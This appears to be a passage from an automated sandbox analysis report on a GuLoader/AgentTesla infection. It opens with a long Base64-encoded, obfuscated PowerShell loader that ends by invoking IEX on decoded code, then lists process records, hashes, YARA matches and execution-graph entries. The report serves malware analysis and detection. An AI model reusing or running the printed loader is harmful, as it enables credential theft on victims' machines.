FMAawAgAFUAbgBSAFAAbABlAEEAZgB0AFMAawByAFcAcgApAE8AcAA7AAoARwBsAFsAVABhAEQAVABlAGwASABvAGwAQQBuAEkARABvAG0AUwBuAHAATgBvAG8AYQB1AHIAUwBrAHQATwBjACgARwBsACIATABpAHcASAB5AGkAUwBhAG4ATwBiAG0AYQBjAG0AQgBhAC4AUwBtAGQAcABoAGwATwBuAGwAUABhACIAYQBsACkARQB4AF0AQQByAHAATQBvAHUAUwBpAGIAQQBhAGwAVABlAGkARABpAGMAUgBpACAAUwB0AHMARABlAHQATQBlAGEAQwB1AHQAQgBlAGkAVABoAGMATABhACAAQwBvAGUARABhAHgARQByAHQAdABvAGUAVABhAHIAQQBtAG4AUgB1ACAAQQByAGkARwByAG4ARwByAHQATABvACAAaABlAEcATABlAGUAVABhAHQAQQBxAEQARQBrAHIATQB5AGkARABvAHYAagBvAGUASABvAHIATABpAE0ARABvAG8ATQBlAGQARQBuAHUARgB1AGwATABpAGUATgBvAEgAdQBuAGEAVgByAG4ASwBhAGQASABlAGwAVgBlAGUAUgBlACgATwBwAGkAawBsAG4ASwBiAHQAVQBuACAARABhAEQAVABlAGkAVgByAHMAVABhADQAUwB0ADAAYwBlACkAUQB1ADsACgBFAGsAWwBhAG4ARABBAGYAbABMAG8AbABVAG4ASQBIAGwAbQBFAGYAcABVAG4AbwBQAHUAcgBZAG4AdABUAGkAKABCAGEAIgBHAGEAdQBCAGwAcwBWAGUAZQBEAG8AcgBVAGQAMwBBAHIAMgBTAG8AIgBEAGEAKQBHAHIAXQBCAGUAcABCAG8AdQBTAGsAYgBOAGUAbABVAHIAaQBPAHUAYwBSAGEAIABKAHUAcwBhAG0AdABCAHIAYQBGAGEAdABTAGMAaQBGAGkAYwBBAGcAIABJAHQAZQBNAGEAeABNAG8AdABSAGUAZQBEAGUAcgBnAG4AbgBVAGQAIABDAGwAaQBCAHIAbgBBAGQAdABLAHUAIABCAHIASQBQAGEAcwBVAG4ARABIAGEAbABBAHMAZwBsAGEAQgBWAGcAdQBmAGEAdABBAGIAdABQAHMAbwBUAHIAbgBEAGUAQwBvAHYAaABFAHIAZQBTAHQAYwBGAGEAawBCAGkAZQBEAGUAZABUAGkAKABGAG8AaQBFAG0AbgBBAGwAdABCAGUAIABQAGEATABUAGkAeQBOAG8AcwBTAGEAawBQAGkAdQBzAHQALABGAG8AaQBnAHIAbgBVAGQAdABmAHUAIABBAG4AUwBJAG0AaQBQAG8AbgBBAGYAaQBUAGoAcwBEAGkAOQBGAGUANABBAHAAKQBhAGYAOwAKAFMAcABbAEYAbABEAFQAaQBsAHMAYQBsAFMAaQBJAFMAcABtAEIAcgBwAEwAZwBvAEUAawByAFAAcgB0AE8AdgAoAFUAbAAiAFUAbgBBAEEAbgBEAEsAdQBWAFAAbABBAEIAaQBQAEgAeQBJAEMAbwAzAEMAYQAyAFAAYQAuAFIAaQBEAEQAaQBMAFIAZQBMAGQAYQAiAFMAcAApAFAAcgBdAFMAdQBwAFQAbwB1AG4AaQBiAFIAaQBsAEQAaQBpAFYAaQBjAFMAdAAgAGIAbwBzAEQAYQB0AEcAYQBhAGYAcgB0AEUAbgBpAEgAeQBjAFUAbgAgAFAAdQBlAHMAbAB4AE4AbwB0AFMAYwBlAFIAZQByAFMAZQBuAGcAcgAgAEMAaABpAHMAYwBuAE8AcAB0AFAAZQAgAEMAaABEAEgAeQBlAE0AaQBsAE4AaQBlAE0AeQB0AE4AbwBlAEQAZQBTAEkAbABlAFYAZQByAEcAaQB2AFIAYQBpAEQAdQBjAFMAYwBlAEsAcgAoAHgAYQBpAEYAbwBuAFQAYQB0AE4AaQAgAEcAZQBBAFMAYwByAEQAbwBjAEsAYQApAGwAZQA7AAoAUwBwAFsARQBtAEQARwBsAGwAUgBpAGwAUwB0AEkARABlAG0AVABlAHAASABvAG8AQQBtAHIARABlAHQARQBpACgAQwBhACIAUwB0AHUASQBuAHMARgByAGUAQwBlAHIAQQByADMAUwBhADIAUABpACIATQBvACkAQwBoAF0AVgByAHAARgByAHUATQBhAGIARgBvAGwASABhAGkARQB4AGMARgBhACAAVQBkAHMAQQByAHQAUgBpAGEATQBhAHQAVABoAGkASQBtAGMASABlACAAUABzAGUASwBvAHgAVAByAHQAQgBsAGUATgBvAHIAVQBwAG4AVQBiACAAZwBuAGkAQwB1AG4AQwBlAHQAUABvACAAUABlAEMATgBvAHIAdwBoAGUARgBlAGEASABvAHQAUAByAGUAUAByAEMAcABpAGEAUwB1AHIAUwBuAGUASQByAHQAZABlACgAQgBvAGkARABpAG4ATwBsAHQAQwBlACAAQQBuAFAARwB1AG8AVABhAGsARwBsAGkAQgBvAGUAcwBlACwAbQBhAGkASwBhAG4ATgBkAHQAVQBlACAAUwB1AFMAQwBvAHUARQBzAHAARABpACwAUwB0AGkATgBvAG4ASQBuAHQAVwBlACAAVQBuAEIAcwBsAGkAVABpAG8AQgBqAHYAUwB1AGEAUgB1ADEAUAB5ADMARABpADcAUwBvACwAUwBrAGkAUwBwAG4AVQBkAHQAUABlACAAVQBkAEkAVgBhAGsATQBvAGEARwByAHMAUwBrAHQASAByAGwAUwBvACkAcgBhADsACgBBAHAAWwBTAHUARABTAHQAbABQAGUAbABHAGUASQBUAGgAbQBQAG8AcABTAHAAbwBUAGkAcgBTAHQAdABRAGEAKABTAGMAIgBOAGUAawBTAGkAZQBCAGkAcgBLAGwAbgBPAHIAZQBSAGUAbABTAGwAMwBTAG8AMgBVAGwAIgBWAGkAKQBtAHUAXQBBAGcAcABFAG4AdQB0AGUAYgBBAHQAbABDAG8AaQBDAHkAYwBTAGgAIABPAHAAcwBFAGYAdABMAHUAYQBPAHYAdABDAG8AaQBNAGEAYwBBAGYAIABJAGQAZQBCAGUAeAByAGUAdABGAG8AZQBUAGUAcgBTAGsAbgBEAGkAIABMAG8AdgBkAGEAbwBXAGgAaQBJAG4AZABUAGUAIABGAHIAUgBTAGEAdAB0AGEAbABUAHUATQBDAG8AbwBaAGUAdgBIAHIAZQBMAGkATQB2AGEAZQBBAG4AbQBNAHUAbwBDAGEAcgBBAHIAeQBSAGgAKABUAHIASQBQAHIAbgBNAGkAdABMAGoAUABZAG4AdABDAGEAcgBhAHIAIABSAGEAdQBJAHMAdgBTAGUAbwBMAGcAcgBIAHkAMQBEAGEALABQAGUAcgBBAGYAZQBGAGwAZgBWAGkAIABNAGEASQBMAGwAbgBLAGUAdABVAGwAMwBzAG8AMgBTAGEAIABGAGkAdQBCAGUAdgBNAHUAbwBLAGEAcgBDAHIAMgBUAGkALABCAGkAaQBJAG4AbgBKAGUAdABNAGkAIABKAGEAdQBDAG8AdgBQAHIAbwBUAGkAcgBEAGkAMwBCAGUAKQBMAGkAOwAKAFAAcgBbAEgAagBEAFAAaQBsAGUAbQBsAEEAbgBJAEgAagBtAFMAYQBwAFYAYQBvAGYAcgByAEYAbwB0AFUAbgAoAEEAdQAiAEcAZQB1AFIAZQBzAFMAaQBlAEEAYQByAFMAeQAzAEIAcgAyAEcAYQAiAFIAYQApAE8AcgBdAE4AbwBwAEUAcgB1AEEAZwBiAGkAbgBsAFMAYwBpAFMAdABjAFUAdAAgAGwAZQBzAFQAbwB0AEEAbgBhAEUAcgB0AFMAawBpAGkAbgBjAGMAYQAgAEQAaQBlAEQAcgB4AFAAcgB0AHMAbgBlAFMAdQByAEgAeQBuAEIAZQAgAFIAZQBpAFMAdQBuAEEAbQB0AFUAZAAgAEgAeQBHAEEAZgBlAEQAZQB0AEMAYQBGAEMAZQBvAFUAbgBjAEUAeAB1AEQAdQBzAFIAZQAoAFUAZAApAFMAYQA7AAoATQBhAFsARABlAEQAQwBvAGwATwBwAGwATwBjAEkARgBvAG0AaQBkAHAAVwBvAG8AUABsAHIASABlAHQAWQBuACgAQwBhACIASQBtAHUAYgByAHMAUgBpAGUAVABoAHIAUABsADMATQBvADIATABpACIAbwBwACwAQgByACAAUwBvAEUAVgBpAG4ARQBuAHQAZABlAHIAVABlAHkARgBlAFAAVgBpAG8ASwBvAGkAQgBhAG4AQQBzAHQAUwB0AD0AUwBsACIARABlAEUAUAByAG4AUgBpAHUAVABlAG0AcwBhAFcAUABlAGkAQgBvAG4ATQBhAGQAQQBuAG8AUwBlAHcAUABhAHMARgBpACIARABhACkARQBzAF0ATQBlAHAASQBvAHUARQBrAGIAVQBkAGwAUwB0AGkAdABpAGMAQwBjACAAUwBlAHMAQwBuAHQAQQBuAGEAVABoAHQARABiAGkAUgBlAGMAUwBrACAASgBlAGUASwBpAHgAQwB5AHQATwBtAGUAUgB1AHIAawBvAG4ASgBkACAAUwBlAEkATABhAG4AVAB5AHQASABpAFAAUwBwAHQARwByAHIAVABoACAAUwBsAFYAUwBrAGkAQgBhAHQATABuAHIAcwBtAHUAQQB3AHMAQQByAGEAUgBlADMASABlADIATgBuACgAUgB1AHUAUABpAGkARQB4AG4AUwB2AHQATABlACAAbABpAHUAVABpAHYAUgBlAG8ATgBlAHIASQBuADUAUwB1ACwASgBhAGkAUwB0AG4ARgBpAHQAUwBpACAAUwBrAHUAQgBlAHYAQQBmAG8ASABhAHIARwBsADYAVABvACkAUwBhADsACgBDAGkAWwBEAGEARABVAHAAbABQAG8AbABVAG4ASQBLAHIAbQBHAHIAcABoAG8AbwBTAHkAcgBJAG4AdABTAGUAKABTAG8AIgBOAHMAawBkAGUAZQBTAHMAcgBSAGkAbgBDAG8AZQBQAHIAbABDAHIAMwB1AGwAMgBFAHgAIgBUAHIAKQBTAGsAXQBuAGUAcABCAGUAdQBQAGUAYgBJAG0AbABOAGkAaQBSAGkAYwBDAGEAIABCAHUAcwBSAGUAdABOAGUAYQBJAG4AdABGAG8AaQBJAG4AYwBjAG8AIABMAG8AZQBIAGkAeABJAGQAdABGAGkAZQBVAG4AcgBCAGUAbgBTAGsAIABTAG8AaQBUAGEAbgBTAGEAdABJAG4AIABQAHIAUwBUAGEAZQBUAG8AdABQAHIAVABEAGEAaABTAHkAcgBEAHYAZQBVAGgAYQBjAG8AZABCAHIAQwBEAGkAbwBQAG8AbgBBAGYAdABOAGUAZQBEAGUAeABBAGwAdABSAGUAKABIAG8AaQBSAGEAbgBPAHIAdABGAHUAIABwAGUATgBEAGEAZQBTAHQAZABTAHUAZgBUAHIAbwBGAG8AdABTAHQALABQAHIAaQBLAHUAbgBVAG4AdABUAGUAIABXAGEATgBTAGsAbwBTAHYAbgBVAGQAZwBGAHIAKQBKAGUAOwAKAEcAdQBbAEIAZQBEAEYAeQBsAFAAbwBsAHMAZQBJAFAAcgBtAFMAaABwAEIAcgBvAEMAcgByAEMAbwB0AEIAdQAoAEMAbwAiAFAAZQBrAEgAaQBlAE0AZQByAEcAdQBuAEYAYQBlAEEAdQBsAEIAYQAzAFMAaAAyAFQAYQAiAEYAbAAsAEIAcgAgAE0AeQBFAEsAaQBuAFMAcAB0AEcAeQByAFIAZQB5AE8AZABQAFAAcgBvAEUAbgBpAEUAZgBuAEwAYQB0AFUAawA9AFIAZQAiAFMAeQAkAFAAZQB1AEEAbAB2AEMAaABvAFUAZAByAHMAawA5AEQAbwAiAEMAbwApAFMAZQBdAFQAYQBwAE0AYQB1AEMAbwBiAEMAaABsAE8AdgBpAEYAeQBjAE0AYQAgAGkAbgBzAE0AZQB0AFMAaQBhAFIAZQB0AEQAZQBpAG0AZQBjAEcAcgAgAGQAeQBlAFUAbgB4AEwAdQB0AG8AdQBlAFMAcQByAEsAYQBuAEUAcwAgAE4AYQBpAEYAbABuAEEAbgB0AFQAaQAgAE8AdQBUAFAAYQBFAFAAZQBMAE0AbwBPAFQAaQAoAFMAYwBpAEsAawBuAEkAbgB0AE8AcAAgAFQAYQBDAFUAZABsAFUAdgBhAEYAbwBkAFMAdgBvAEIAZQBnAFIAYQBlAFMAaQBuAEMAbwBlAEcAZQB0AEgAYQA2AHMAcgAsAEYAaQAgAE8AcABpAFcAYQBuAFYAYQB0AEUAeAAgAE0AYQBEAFAAcgB5AEIAZQBuAEQAZQBlAEIAbwAsAFMAbwBpAEkAbgBuAEYAbAB0AFoAeQAgAFQAZQB1AEQAYQB2AFMAYQBvAEEAcgByAHMAawAsAEsAbAAgAFIAZQBpAEQAcgBuAFQAcgB0AEYAZQAgAEYAbgBDAE4AbwBsAEIAZQBhAFIAZQBkAEIAYQBvAEcAbwBnAFMAdQBlAEYAbwBuAFMAdABlAFIAZQB0AEkAbgApAFMAYQA7AAoATABpAH0ACgBEAG8AIgBMAHIAQAAKAEcAcgAkAEkAbgBDAEYAaQBsAE4AdQBhAEgAZQBkAEsAZQBvAEQAZQBnAEwAYQBlAEoAdQBuAE0AbwBlAFIAZQB0AEIAbwAzAGQAbwA9AFIAbwBbAFMAdABDAHMAYQBsAEwAZQBhAFMAdABkAEIAZQBvAFYAZQBnAFIAYQBlAFkAbwBuAFMAbwBlAEIAcgB0AFUAZAAxAEoAYQBdAFkAbwA6AEYAbAA6AFIAaABUAEEAbABFAEYAbwBMAEYAbwBPAEcAcgAoAEwAaQAwAE0AYQAsAFMAZQAxAFAAZQAwAE0AYQA0AFMAdQA4AFQAcgA1AFMAbwA3AE0AbwA2AEEAZQAsAFQAdQAxAFMAcAAyAFIAdQAyAEEAYwA4AEkAbgA4AEUAcAAsAEcAdQA2AEgAYQA0AEwAbwApAAoAaQBuACQAUwBrAEsAUwBrAHYAUwB0AGEAUwBlAHIARQBkAHQASwBvAGEAUwBhAGwARABvAHMARgBvAHYARgBvAD0AVABhACgASwBsAEcAUABhAGUAQgByAHQAQQBtAC0ATQBhAEkARQBuAHQARgBsAGUATABkAG0AVABhAFAARgBvAHIAcABlAG8AQgBsAHAARABvAGUAVQBuAHIARABhAHQASgB1AHkARABpACAAUgBvAC0AUwB5AFAAVABpAGEAUwB1AHQATgByAGgAVQBkACAAVgBhACIAQQByAEgAVgBhAEsASABqAEMAUABvAFUAQwBhADoAQQBmAFwASwByAFMAVABlAG8ASQBuAGYARgBvAHQARgB1AHcARQBsAGEAVgBpAHIASABvAGUAUwBsAFwAVwBvAGQATgBvAHIAYwBhAG0ARgBsAG0ATwB2AGUASwB2AHIAUwBoACIAUABlACkARAB1AC4AVABlAHMASQBtAGsAQgBhAG8AVQB1AGwAVAByAGUACgBGAG8AJABVAGQASQBPAG4AbgBHAHUAdABUAG8AZQBFAHgAcgBDAGEAcABDAGUAbABUAGEAIABEAHIAPQBTAHkAIABDAG8AWwB1AG4AUwBFAHYAeQBSAGUAcwBTAHQAdABTAGwAZQBCAHIAbQBTAGEALgBVAGQAQgBEAHUAeQBDAGUAdABCAHUAZQBzAGsAWwBOAGUAXQBPAG0AXQBDAG8AOgBPAHYAOgBGAHkAQwBSAGUAcgBSAGUAZQBNAG8AYQBOAGEAdABTAGsAZQBUAGUASQBTAHAAbgBLAGEAcwBTAHkAdABCAGoAYQBQAHIAbgBEAGUAYwBUAHIAZQBlAHUAKABFAHgAWwBPAHAAUwBGAG8AeQBBAGMAcwBBAGYAdABCAGkAZQBrAG8AbQBQAGEALgBOAGUAQgBBAGMAeQBhAGwAdABUAHIAZQBTAGkAXQBCAGwALABTAHAAJABGAGUASwBTAGwAdgBOAGEAYQBXAGEAcgBQAGEAdABDAG8AYQBSAGUAbABSAGUAcwBGAG8AdgBiAGkALgBIAHkATABTAGUAZQBPAHYAbgBSAGUAZwBGAG8AdABCAG8AaABNAGkAIABTAHQALwBSAGUAIABTAG0AMgBSAGEAKQAKAEMAaQBGAFMAagBvAE8AdQByAEUAcAAoAEYAbwAkAEEAZwBpAEUAcwA9AEkAbgAwAGYAcgA7AEIAZQAgAHQAZQAkAFMAZQBpAFMAaQAgAFUAcgAtAEwAYQBsAFQAbwB0AFMAYQAgAEMAbwAkAFMAYQBLAEEAbgB2AE4AeQBhAFAAcgByAEkAcwB0AEYAcgBhAEIAcgBsAFYAYQBzAEgAdQB2AEgAZQAuAE8AbABMAFUAbgBlAEMAbABuAEYAZQBnAEMAbwB0AFAAYQBoAFQAYQA7AFMAbwAgAEUAbgAkAE0AYQBpAEEAdQArAEsAdQA9AEkAbgAyAEQAZQApAAoAUwBuAHsACgBPAHYACQBVAGQAJABMAGUASQBOAG8AbgBTAGwAdABIAGkAZQBTAGEAcgBIAHkAcABUAHUAbABBAGwAWwBBAG4AJABxAHUAaQBLAHYALwBuAHUAMgBGAGkAXQBBAHIAIABWAG8APQBGAG8AIABGAGkAWwBDAGUAYwBJAG4AbwBFAG0AbgBiAGEAdgBWAGEAZQBTAHQAcgBTAHIAdABPAGwAXQBLAG4AOgBPAHAAOgBTAGkAVABGAGkAbwBEAGUAQgBSAGEAeQBLAG8AdABUAHYAZQBZAGEAKABsAGEAJABNAGEASwBWAG8AdgBNAGEAYQBMAGEAcgBVAG4AdABEAGUAYQBNAGUAbABCAGEAcwBSAGUAdgBEAHIALgBHAGEAUwBWAGEAdQBEAGkAYgBNAGUAcwBXAGUAdABVAHAAcgBEAGkAaQBIAHMAbgBTAHQAZwBUAGUAKABEAHkAJABNAGEAaQBFAHMALABSAGUAIABBAHIAMgBJAG4AKQBzAHQALABCAGUAIABJAG4AMQBQAGkANgBTAGEAKQAKAEYAbwB9AAoAQQB1AGYATwB2AG8ATAB1AHIASgBlACgAVAB5ACQAUwB2AFMAUgBoAHYAawBvAGUAVgByAGoATgB5AHMAYwBoAGUARwBvAG0ASwByAGUATwBwAD0AZABhADAARgBpADsATABpACAAVABhACQAUgBlAFMAQgBsAHYAUgB1AGUAVQBkAGoAVQBkAHMASQBuAGUATgBhAG0AQQBjAGUATQBhACAASwBvAC0AQQBzAGwAUwBhAHQAcwB1ACAASAB5ACQAdQBuAEkAVQBuAG4ASABrAHQAcwBlAGUARgBvAHIARwBhAHAAVQBuAGwARgBpAC4AQQB1AGMASAB5AG8AUwBhAHUAUAByAG4ARgByAHQAUwBtACAAVABqADsAUgBlACAASwByACQASwBsAFMATwBsAHYAWgBpAGUAUwBrAGoAUgB1AHMAVgBlAGUATgB5AG0ATABpAGUASwBhACsARABpACsAUwBuACkACgBTAGUAewAKAEIAaQAJAEgAZQBbAFQAaQBDAFcAaABsAFMAZQBhAFMAdABkAEMAaABvAFMAawBnAEwAaQBlAGYAbwBuAEEAcgBlAEMAbwB0AEEAYgAxAEIAbABdAEUAZgA6AFQAcgA6AFAAaQBSAFQAagB0AHAAaABsAFUAbABNAEQAYQBvAE8AdQB2AEQAeQBlAFUAbgBNAEUAbgBlAEEAZABtAEQAaQBvAEwAbwByAFUAbgB5AGcAaQAoAFcAYQAkAFMAdQBDAEYAZQBsAEwAbwBhAEEAZABkAEgAeQBvAE8AdQBnAEcAcgBlAFAAbABuAEMAaABlAFUAbgB0AEEAcgAzAFIAZQArAFMAYwAkAFUAbgBTAFkAdQB2AFUAbgBlAE4AaQBqAEMAbwBzAGEAcgBlAEgAcgBtAHMAbwBlAE0AZQAsAGYAcgBbAEkAZAByAFUAbgBlAEQAdQBmAFAAbABdAEMAbAAkAEQAZQBJAFMAeQBuAEcAcgB0AEQAZQBlAGIAZQByAFUAbgBwAEkAbQBsAHYAaQBbAEcAZQAkAFQAZQBTAEYAaQB2AEQAaQBlAEIAYQBqAE0AbwBzAFIAZQBlAEwAaQBtAE8AdQBlAFAAdQBdAFUAbgAsAFQAdgAxAFMAdQApAAoATwBtAH0ACgBMAGkAWwBQAGUAQwBLAGEAbABTAGwAYQBiAG8AZABVAG4AbwBGAGEAZwBFAGwAZQBhAGcAbgBDAGEAZQBXAGkAdABNAHUAMQB0AHUAXQBCAG8AOgBNAG8AOgBLAHIAVgBQAHIAaQBQAHIAdABIAGUAcgBPAHIAdQBSAGEAcwBVAG4AYQBTAHQAMwBTAGEAMgBOAGUAKABUAHIAJABUAGkAQwBWAGkAbABwAGEAYQBJAG4AZABDAHkAbwBTAGwAZwBJAG0AZQBOAG8AbgBTAGEAZQBHAGwAdABTAHQAMwBEAGkALABBAGEAIABWAGkAMABGAG8AKQBMAG8AIwAKACcAQAANAAoADQAKAA0ACgANAAoADQAKAEYAbwByACgAJABpAD0AMgA7ACAAJABpACAALQBsAHQAIAAkAE0AaQBsAGoAdgByAG4AZQB0AGwALgBMAGUAbgBnAHQAaAAtADEAOwAgACQAaQArAD0AKAAyACsAMQApACkADQAKAHsADQAKAAkADQAKAAkAJAB1AHYAbwByACAAPQAgACQAdQB2AG8AcgAgACsAIAAkAE0AaQBsAGoAdgByAG4AZQB0AGwALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMQApAA0ACgAJAA0ACgAJAGkAZgAgACgAJABNAGkAbABqAHYAcgBuAGUAdABsAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkAKwAxACwAIAAxACkAIAAtAGUAcQAgACIAYABuACIAKQAgAHsADQAKAAkACQAkAHUAdgBvAHIAIAA9ACAAJAB1AHYAbwByACAAKwAgACIAYABuACIADQAKAAkACQAkAGkAIAA9ACAAJABpACAAKwAgADEADQAKAAkAfQAgAAkADQAKAAkACQANAAoACQANAAoAfQANAAoADQAKAA0ACgBJAEUAWAAgACQAdQB2AG8AcgANAAoA
Imagebase:	0x630000
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000014.00000002.2220743788.0000000009E20000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000014.00000002.2220743788.0000000009E20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000014.00000002.2103587544.0000000004C30000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000014.00000002.2099293106.0000000003010000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000014.00000002.2096104717.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000014.00000003.1512001892.0000000002F62000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000014.00000003.1609777781.00000000086AD000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000014.00000002.2094575687.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000014.00000002.2098442263.0000000002F6B000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000014.00000002.2100345664.0000000003290000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000014.00000003.1523532169.0000000002F6B000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000014.00000002.2105674011.0000000005081000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
Reputation:	moderate

Show Windows behavior

Target ID:	21
Start time:	16:12:34
Start date:	03/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff670ca0000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	23
Start time:	16:13:02
Start date:	03/10/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.cmdline
Imagebase:	0xa40000
File size:	2141552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Show Windows behavior

Target ID:	24
Start time:	16:13:02
Start date:	03/10/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA2B2.tmp" "c:\Users\user\AppData\Local\Temp\sepi5xx1\CSC7F7A267C826A46D5AA3589EC91649B9.TMP"
Imagebase:	0xcd0000
File size:	46832 bytes
MD5 hash:	70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Target ID:	25
Start time:	16:13:20
Start date:	03/10/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
Imagebase:	0xc0000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Target ID:	26
Start time:	16:13:20
Start date:	03/10/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
Imagebase:	0xf70000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 0000001A.00000000.1970106356.0000000001350000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001A.00000000.1970106356.0000000001350000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Execution Graph

Execution Coverage:	9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	36
Total number of Limit Nodes:	4

Executed Functions

Function 0850DE20 Relevance: 1.6, APIs: 1, Instructions: 125
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateNamedPipeW.KERNELBASE(?,?,?,?,?,?,00000001,00000000), ref: 0850DF40

Memory Dump Source

Source File: 00000014.00000002.2186621639.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_8500000_powershell.jbxd

Similarity

API ID: CreateNamedPipe
String ID:
API String ID: 2489174969-0
Opcode ID: 3647d61fd50da7f9abe9b13e64cf7bd80ddb2a0b7a2434fb6a23aeadd253d170
Instruction ID: 8042e40a8752931fd0b83478a10f8c088e6847904654d643f1a4587e384c5df1
Opcode Fuzzy Hash: 3647d61fd50da7f9abe9b13e64cf7bd80ddb2a0b7a2434fb6a23aeadd253d170
Instruction Fuzzy Hash: C551D2B1D013089FDB14CFA9C984B8EFBF6BF88304F24852AE508AB291D7749985CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0850E468 Relevance: .6, Instructions: 634COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2186621639.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_8500000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d90c0b2b53db7c8ca740fe2ec3692a8c3a9eef4e801357b895320dc962d00d3e
Instruction ID: 107d32965abcf8a5893cd0afd63778d888df3c4274f43dc1a4d1851bb7189c5a
Opcode Fuzzy Hash: d90c0b2b53db7c8ca740fe2ec3692a8c3a9eef4e801357b895320dc962d00d3e
